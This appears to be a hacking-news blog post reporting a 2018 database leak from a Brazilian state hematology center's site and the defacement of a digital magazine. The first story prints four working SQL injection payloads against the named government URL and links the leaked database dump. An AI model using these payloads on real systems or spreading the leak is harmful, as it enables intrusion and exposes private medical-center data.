Agência de Tecnologia da Informação do Piauí Hacked by Shizen & Ftp

Just before the start of the new year, December 31st 2018, hackers “Shizen” and “Ftp” of New World Hackers announced a joint hack of the Information Technology Agency of Piauí, Brasil, managing to leak the contents of databases tied to the Hematology and Hemotherapy Center of Piaui online. Having covered Shizen many times throughout the past, this appears to be the first hack carried out under the banned of New World Hackers, after previously conducting hacks on behalf of Pryzraky – perhaps indicating a change of teams or allegiances. 

Regardless, to serve as proof of the hack, in a data dump posted to Twitter this morning, the hackers posted a mirror of the sites contents – 21 different databases in all. Analyzing the hack, it appears as though the group was able to gain remote access to site databases through a multitude of SQL vulnerabilities left unaddressed by site security architects, ultimately granting hackers access to PHP 5.3.3 files, attached to a MySQL 5.0 Database hosted on an Apache 2.2.16 web server. In another surprise move, Shizen even released the exact vulnerabilities effected and payloads delivered within the framework of the leak itself – something normally redacted or kept private.

For Example, Here are The 4 SQL Vulnerabilities Implicated:

Website Hit: hxxp://hemopi.pi.gov.br/

Vulnerability 1: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=13′ AND 7214=7214 AND ‘aWjt’=’aWjt

Vulnerability 2: error-based
Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=13′ AND (SELECT 8268 FROM(SELECT COUNT(*),CONCAT(0x716a767071,(SELECT (ELT(8268=8268,1))),0x716a716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ‘lEbP’=’lEbP

Vulnerability 3: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=13′ AND SLEEP(5) AND ‘ouoQ’=’ouoQ

Vulnerability 4: UNION query
Title: Generic UNION query (NULL) – 4 columns
Payload: id=13′ UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a767071,0x78547676494a654761784744686253746e706c6f6a6a57526655576a6e6863626866495874446f56,0x716a716a71)– EKMl

Raw Database Leak: https://ghostbin.com/paste/6w4ok

Image may contain: text

https://twitter.com/__sh1z3n/status/1079589738355531777

Nodes Digital Magazine PWNED by Knushh

In a posting on Twitter December 17th 2018, hacker “Knushh” proudly displayed his most recent hack, a complete deface of Nodes Digital Magazine. Upon visiting the website, instead of displaying the most recent cyber news as it was designed, users are greeted with a list of 25 indexes and databases attached to the sites Apache version 2.4.18 web server. Then, once you try clicking on any of the tables listed, you are brought to pages disconfigured and defaced to display the following message:

No automatic alt text available.

Translated into English, this essentially reads “motivated for no other reason than to disfigure – lulz.” It is important to note that it was not just the website’s back end php file destination that was hacked, literally every page affiliated with the website has been hacked and defaced with the same message and image, indicating that the entire website was completely and utterly “pwned” by Knushh. Not only this, but more than 48 hours later now, the website has yet to be fixed or restored back to its previous or original settings, indicating that Knushh was also able to change the websites login credentials to locked out the sites administrators entirely – or they are completely unaware of the incident altogether.

At the present moment in time no databases attached to or affiliated with the site have been leaked online.

Website Effected: hxxp://revistaescolarnodos.com/

https://twitter.com/Knushh/status/1074903753260785664